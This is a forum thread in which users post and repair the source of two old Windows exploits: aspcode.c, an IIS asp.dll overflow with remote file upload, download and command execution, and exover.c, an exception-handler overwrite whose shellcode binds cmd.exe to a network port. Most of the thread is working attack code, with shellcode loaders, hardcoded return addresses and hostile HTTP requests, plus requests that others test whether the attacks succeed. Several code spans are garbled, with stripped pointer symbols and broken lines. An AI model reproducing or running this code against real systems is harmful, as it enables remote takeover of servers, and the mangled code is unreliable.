for(i=0;i<j;++i,++str){ if(str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(str==' ') { str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(str==' ') { str=0; break; } } if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh); strcpy(buff,"put "); (int )(buff+4)=filesize; filesize=(int )(buff+4); strcpy(buff+0x8,filename2); newsend(fd,buff,i+0x9,0); printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize); Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ filesize-=size; newsend(fd,buff,size,0); // Sleep(0100); } } // size=filesize; // ReadFile(fpt,buff,size,&size,NULL); // if(size>0) send(fd,buff,size,0); CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char str){ char filename; char filename2; FILE fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i<j;++i,++str){ if(str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(str==' ') { str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(str==' ') { str=0; break; } } if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get "); strcpy(buff+0x4,filename2); newsend(fd,buff,i+0x5,0); printf("\n get file:%s from file:%s",filename,filename2); j=0; ioctlsocket(fd, FIONBIO, &j); i=0; filesize=0; j=0; while(j<100){ // Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=(int )(buff+4); j=100; } else { / for(j=0;j<i;++j){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[j]^=lockcharvar; // DATAXORCODE; } / j=0; printf("\n recv %s",buff); } } else ++j; // if(j>1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; filesize-=i; WriteFile(fpt,buff+8,i,&i,NULL); } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ filesize-=size; WriteFile(fpt,buff,size,&size,NULL); } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } void iisreset(int fd,char str){ char buff[0x2000]; int i,j; printf("\nreset xor data.\n"); Sleep(1000); j=0; ioctlsocket(fd, FIONBIO, &j); strcpy(buff,"reset"); newsend(fd,buff,strlen(buff),0); Sleep(1000); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ j=recv(fd,buff,0x2000,0); if(j>0){ buff[j]=0; for(i=0;i<j;++i){ if(buff[i]==0) buff[i]='b'; } // printf("\nrecv 0x%x bytes:%s",j,buff); if(strstr(buff,"xordatareset")!=0){ printf("\nxor data reset ok.\n"); for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } break; } } // else if(j==0) break; // strcpy(buff,"\r\nmkdir d:\\test6\r\n"); // newsend(fd,buff,strlen(buff),0); } Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); // printf("aaa"); } void iisdie(int fd,char str){ char buff[0x200]; int j; printf("\niis die.\n"); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisrr "); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; } void iiscmd(int fd,char str){ char cmd="\0"; char buff[2000]; int i,j; j=strlen(str); for(i=0;i<j;++i,++str){ if(str!=' '){ cmd=str; break; } } j=strlen(str); for(i=0;i<j;++i){ if((str+j-i-1)!=' ') { break; } else (str+j-i-1)=0; } if(cmd=="\x0") { printf("\niiscmd cmd\n"); return; } printf("\nbegin run cmd:%s",cmd); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisc "); strcat(buff,cmd); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; / } int newrecv(int fd,char buff,int size,int flag){ int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } else{ if(k>0){ buff[k]=0; if(strstr(buff,"XORDATA")!=0) { xordatabegin=1; for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } } } return(k); } int newsend(int fd,char buff,int size,int flag){ int i; for(i=0;i<size;++i){ lockintvar2=lockintvar20x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } return(send(fd,buff,size,flag)); } void iishelp(){ printf("\nusage:"); printf("\niisget filename filename. get file from web server."); printf("\niisput filename filename. put file to web server."); printf("\niiscmd cmd. run cmd on web server."); printf("\niisreset. reset the xor data."); printf("\niisdie. reset the asp door."); printf("\n\n"); } 2009-10-6 16:48 0
jeffcjh 雪币： 58 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 267 粉丝 0 关注私信	jeffcjh 3 楼 aspcode.c编译可以通过，但能否实现攻击功能，请测试一下。 2009-10-6 16:49 0
jeffcjh 雪币： 58 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 267 粉丝 0 关注私信	jeffcjh 4 楼网址http://www.nsfocus.net/index.php?act=magazine&do=view&mid=682 包含两个独立的源程序代码：except.c和exover.c，分别是存在漏洞的程序和攻击程序。对于except.c，欲成功编译，需要加上ws2_32.lib库文件的支持，加在#include头文件之后，即： #include <windows.h> #include <winsock.h> #include <stdio.h> // 增加对ws2_32.lib库文件的支持 #pragma comment (lib, "ws2_32.lib") int main(int argc, char *argv) 而对exover.c，需要作如下修改： 1、增加 #pragma comment (lib, "ws2_32.lib") 2、将某些被回车换行符割断的变量名和代码行接到一行上（看VC提示哪行报错，转到那行就明白了） 3、代码段 _asm { mov ESI,ESP cmp ESI,ESP } 前的大括号}是多余的，必须去掉修改后的代码如下供参考，同样编译通过，但能否事先袁哥所说的攻击请测试一下： / 利用异常结构绕过溢出保护攻击的攻击程序exover.c。上面程序运行在win2000下此攻击程序溢出成功。 vc6.0下编译通过。 yuange@nsfocus.com / / except overflow program ver 1.0 copy by yuange <yuange@163.net> 2000。06。20 / #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib, "ws2_32.lib") #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x20 #define BUFFSIZE 0x20000 #define RETEIPADDRESS 0x0 #define SHELLPORT 0x1f90 / 0x1f90=8080 / #define WEBPORT 1080 void shellcodefnlock(); void shellcodefn(); void cleanchkesp(char fnadd,char shellbuff,char chkespadd ,int len); int main(int argc, char *argv) { char server; char str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "wsock32.dll""\x0""socket""\x0" "bind""\x0""listen""\x0" "accept""\x0""send""\x0" "recv""\x0""ioctlsocket""\x0" "closesocket""\x0" "cmd.exe""\x0""exit\x0d\x0a""\x0" "strend"; / shellcode用到的api名等字符串 / char fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char eipwinnt[]="\x63\x0d\xfa\x7f"; /* jmp ebx address / / win2000发生异常时ebx指向异常结构， winnt 有的版本是esi,有的版本是edi / char JMPNEXTJMP[]="\x90\x90\x90\x2d"; / 0x2d sub eax,num32 用于平衡后面的4字节任意代码，使得连续覆盖溢出点的这段代码指令等效于NOP / char JMPSHELL[]="\xe9\x40\xf0\xff\xff"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent he; char shellcodefnadd,chkespadd; unsigned int sendpacketlong; int i,j,k; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int OVERADD2=0xfb8; int result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(argc <2){ WSACleanup( ); fprintf(stderr, "\n except over 1.0."); fprintf(stderr, "\n copy by yuange 2000.06.20."); fprintf(stderr, "\n welcome to my homepage http://yuange.yeah.net."); fprintf(stderr, "\n usage: %s <server> [shellport] [webport] \n", argv[0]); exit(1); } else server = argv[1]; d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char ) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr )&s_in3, sizeof(struct sockaddr_in))!=0) closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); exit(1); //} __asm { mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=chkespadd; if(temp==0xe9) { ++chkespadd; i=(int)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=(int )shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=(int )shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for (i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); if(argc>2) shellcodeport=atoi(argv[2]); else shellcodeport=SHELLPORT; if(shellcodeport==0) shellcodeport=SHELLPORT; shellcodeport=htons(shellcodeport); (u_short )(shellcodebuff+k)=shellcodeport; fprintf(stderr,"\n shellport %d",htons(shellcodeport)); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i<sendpacketlong;++i){ temp=shellcodebuff[i]; if(temp<=0x10\|\|temp=='0'){ / 对shellcode的特殊字符编码 / buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } for(i=-0x30;i<0x20;i+=8){ memcpy(buff+OVERADD2+i,JMPNEXTJMP,4); / 覆盖异常结构的下一个异常链next数据，发生异常时ebx制向这与通常的发生溢出时ESP指向溢出代码附近不一样，发生异常时的ESP不在这附近 / memcpy(buff+OVERADD2+i+4,eipwinnt,4); / 覆盖异常结构的程序指针发生异常时会转到这指针去运行这覆盖的是一个jmp ebx指令的地址 / } / 连续覆盖，增大覆盖掉异常结构的可能性 / memcpy(buff+OVERADD2+8,JMPSHELL,5); / 跳到shellcode去的跳转代码，远跳转。 / sendpacketlong=0x1000-0x10; for(i=0;i<1;++i){ j=sendpacketlong; fprintf(stderr,"\n send packet %d bytes.",j); send(fd,buff,j,0); k=recv(fd,recvbuff,0x1000,0); if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } closesocket(fd); WSACleanup( ); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop / 用于定位下面一小段汇编指令的NOP 串 / jmp next getediadd: pop EDI push EDI pop ESI xor ecx,ecx mov cx,0x0fd0 looplock: lodsb cmp al,0x30 jnz sto lodsb sub al,0x40 sto: stosb loop looplock jmp shell next: call getediadd / 解码shellcode / shell: NOP NOP NOP NOP NOP NOP NOP NOP } } / 真正实现功能的shellcode / / 本shellcode实现开端口绑定cmd.exe 的功能 / void shellcodefn() { char Buff[0x800]; int except[3]; FARPROC closesocketadd; FARPROC ioctlsocketadd; FARPROC recvadd; FARPROC sendadd; FARPROC acceptadd; FARPROC listenadd; FARPROC bindadd; FARPROC socketadd; /* FARPROC WSAStartupadd; / FARPROC NOPNOP; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; char stradd; int imgbase,fnbase,k,l; HANDLE libhandle; STARTUPINFO siinfo; SOCKET listenFD,clientFD; struct sockaddr_in server; int iAddrSize = sizeof(server); int lBytesRead; u_short shellcodeport; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(( WORD )imgbase=='ZM'&& (WORD )(imgbase+(int )(imgbase+0x3c))=='EP'){ fnbase=(int )(imgbase+(int )(imgbase+0x3c)+0x78)+imgbase; k=(int )(fnbase+0xc)+imgbase; if((int )k =='NREK'&&(int )(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+(int )(fnbase+0x20); for(l=0;l<(int ) (fnbase+0x18);++l,k+=4){ if((int )(imgbase+(int )k)=='PteG'&&(int )(4+imgbase+(int )k)=='Acor'){ k=(WORD )(l+l+imgbase+(int )(fnbase+0x24)); k+=(int )(fnbase+0x10)-1; k=(int )(k+k+k+k+imgbase+(int )(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } /* 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址注意这儿处理了搜索页面不在情况。 / _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto die ; shellcodeport=(u_short )stradd; stradd+=2; for(k=1;k<17;++k) { if(k==8) libhandle=procloadlib(stradd); else apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if((stradd)==0&&(stradd+1)!=0) break; } ++stradd; } / WSAStartupadd(MAKEWORD(1, 1), &wsaData); / listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port =shellcodeport; server.sin_addr.s_addr=0; k=1; while(k!=0){ k=bindadd(listenFD,&server,sizeof(server)); server.sin_port+=0x100; if(server.sin_port<0x100) ++server.sin_port; } listenadd(listenFD,10); while(1){ clientFD=acceptadd(listenFD,&server,&iAddrSize); sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); / ZeroMemory(&siinfo,sizeof(siinfo)); / _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW\|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); / k=1; ioctlsocketadd(clientFD, FIONBIO, &k); / / 还是阻塞模式比较好，占用CPU时间少，要不下面死掉的时候就老占用CPU，造成受攻击系统反应比较慢。 / while(1){ PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead>0) { ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0); else sendadd(clientFD,stradd,8,0); } else{ lBytesRead=recvadd(clientFD,Buff,1024,0); if(lBytesRead<=0){ lBytesRead=6; WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0); closesocketadd(clientFD); break; / TELNET连接中断，退出等到再一次连接 / } else{ sendadd(clientFD,Buff,lBytesRead,0); / 回显，有些TELNET不能设置本地响应会看不到命令输入很不方便。 / WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); } } } } die: goto die ; _asm{ getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 / stradd-0xe / xor eax,eax / 2 bytes / ret / 1 bytes / execptprogram: jmp errprogram / 2 bytes stradd-7 / nextcall: call getstradd / 5 bytes / NOP NOP NOP NOP NOP NOP NOP NOP NOP } } / 清除shellcdoe里面的chkesp调用 / void cleanchkesp(char fnadd,char shellbuff,char chkesp,int len) { int i,k; unsigned char temp; char calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } 2009-10-6 17:07 0
jeffcjh 雪币： 58 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 267 粉丝 0 关注私信	jeffcjh 5 楼这是代码作者有意留下的一些初等问题，主要就是想考验一下我等菜鸟吧。 2009-10-6 17:09 0
dydebug 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 9 粉丝 0 关注私信	dydebug 6 楼谢谢jeffcjh大侠啊哈终于编译通过了 2009-10-6 21:05 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

jeffcjh

雪币： 58

活跃值： (28)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

267

粉丝

0

关注

私信

jeffcjh: 2 楼

对于兄弟的第二个代码aspcode.c，到该网址上L复制出代码后，粘贴到VC6编辑器中，直接编译会报告一大堆错误，仔细看一下，都是一些源代码字符串不符合规定造成的，基本上都是
变量名或常量名或注释
被不适当的的回车换行符给截断了，造成VC误解出错，
只要将它们调整到一行上即可编译通过。

注：直接在IE地址栏打开网址
http://www.packetstormsecurity.org/0209-exploits/aspcode.c
看到的是不换行的“通篇”代码，很难看的，这时可以点击鼠标右键查看源文件，看到的代码就是整齐的了。
一个小技巧。

附调整后的代码供参考：
/*
aspcode.c  ver1.0
iis4.0、iis5.0、iis5.1    asp.dll  overflow program
copy by yuange <yuange@nsfocus.com>  2002.4.24
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma  comment(lib,"ws2_32")
//#define  RETEIPADDR  eipwin2000
#define  FNENDLONG 0x08
#define  NOPCODE    0x90
#define  NOPLONG    0x50
#define  BUFFSIZE 0x20000
#define  PATHLONG 0x12
#define  RETEIPADDRESS 0x468
#define  SHELLBUFFSIZE 0x800
#define  SHELLFNNUMS 14
#define  DATABASE    0x61
#define  DATAXORCODE 0x55
#define  LOCKBIGNUM 19999999
#define  LOCKBIGNUM2 13579139
#define  MCBSIZE    0x8
#define  MEMSIZE    0xb200
#define  SHELLPORT 0x1f90 //0x1f90=8080
#define  WEBPORT    80
void    shellcodefnlock();
void    shellcodefnlock2();
void    shellcodefn(char *ecb);
void    shellcodefn2(char *ecb);
void    cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int
   len);
void    iisput(int fd,char *str);
void    iisget(int fd,char *str);
void    iiscmd(int fd,char *str);
void    iisreset();
void    iisdie();
void    iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int  lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
"\x09""asp.dll""\x0""HttpExtensionProc""\x0"
"\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0""xordatareset""\x0"
"strend";
//  char buff0[]="TRACK / HTTP/1.1\nHOST:";
char buff1[]="GET /";
char buff2[]="default.asp";
char *buff2add;
char buff3[]="?!!ko ";
char buff4[]=" HTTP/1.1 \nHOST:";
char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
char buff51[]="\nTransfer-Encoding:chunked";
char buff6[]="\nContent-length: 2147506431\r\n\r\n";  // 0x80000000+MEMSIZE-1
char buff61[]="\nContent-length: 4294967295\r\n\r\n";  // 0xffffffff
char buff7[]=
"\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
char buff11[]=
"\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/*
char
buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
char
buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
char
buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
char
buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
char
buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
char
buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
*/
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";

char  *eipexceptwin2000add;
char  eipexceptwin20002[]="\x80\x70\x9f\x74"; //  push ebx ; ret  address
char  eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; //  push ebx ; ret  address
char  eipexceptwin2000[]="\x80\x70\x97\x74";
//    char  eipexceptwin2000[]="\xb3\x9d\xfa\x77";  // \x01\x78";
//  call ebx  address
char  eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
char  eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
//    char  eipexceptwin2000[]="\x0B\x08\x5A\x68";
//  char  eipexceptwin2000[]="\x32\x8d\x9f\x74";
char  eipexceptwinnt[]  ="\x82\x01\xfc\x7F";    //  push esi ; ret  address
//    char  eipexceptwinnt[]  ="\x2e\x01\x01\x78";
//  call  esi  address
//  char  eipexcept2[]="\xd0\xae\xdc\x77";  //
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[BUFFSIZE];
char shellcodebuff2[BUFFSIZE];
struct  sockaddr_in s_in2,s_in3;
struct  hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned  int sendpacketlong,buff2long,shelladd,packlong;
int i,j,k,l,strheadlong;
unsigned  char temp;
int    fd;
u_short port,port1,shellcodeport;
SOCKET  d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange 2002.4.24.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n",
argv[0]);
buff2add=buff2;
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
         if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
fprintf(stderr,"\n please enter the .asp filename:");
gets(shellcodebuff);
for(i=0;i<strlen(shellcodebuff);++i){
if(shellcodebuff[i]!=' ') break;
}
buff2add=shellcodebuff+i;
printf("\n .asp file name:%s\n",buff2add);
}
eipexceptwin2000add=eipexceptwin2000;
// printf("\n argc%d argv%s",argc,argv[5]);
if(argc>5){
if(strcmp(argv[5],"cn")==0) {
eipexceptwin2000add=eipexceptwin2000cn;
printf("\n For the cn system.\n");
}
if(strcmp(argv[5],"sp0")==0) {
eipexceptwin2000add=eipexceptwin20002;
printf("\n For the sp0 system.\n");
}
if(strcmp(argv[5],"msvcrt")==0) {
eipexceptwin2000add=eipexceptwin2000msvcrt;
printf("\n Use msvcrt.dll JMP to shell.\n");
}
if(strcmp(argv[5],"sp2")==0) {
eipexceptwin2000add=eipexceptwin2000sp2;
printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
}
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
/*
if(argc>4){
offset=atoi(argv[4]);
}
//  OVERADD+=offset;
//  packlong=0x10000-offset+0x8;
if(offset<-0x20||offset>0x20){
fprintf(stderr,"\n offset error !offset  -32 --- +32 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
//    WSACleanup( );
//    exit(1);
}
else  server = argv[1];
for(i=0;i<strlen(server);++i){
      if(server[i]!=' ')
break;
}
if(i<strlen(server)) server+=i;
for(i=0;i+3<strlen(server);++i){

if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
      he = gethostbyname(server);
      if(!he)
      {
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
      }
      else memcpy(&d_ip, he->h_addr, 4);
}

if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));

s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0)
{
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n  connect err.");
gets(buff);
exit(1);
}

_asm{
         mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
         ++chkespadd;
         i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
}
/*
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
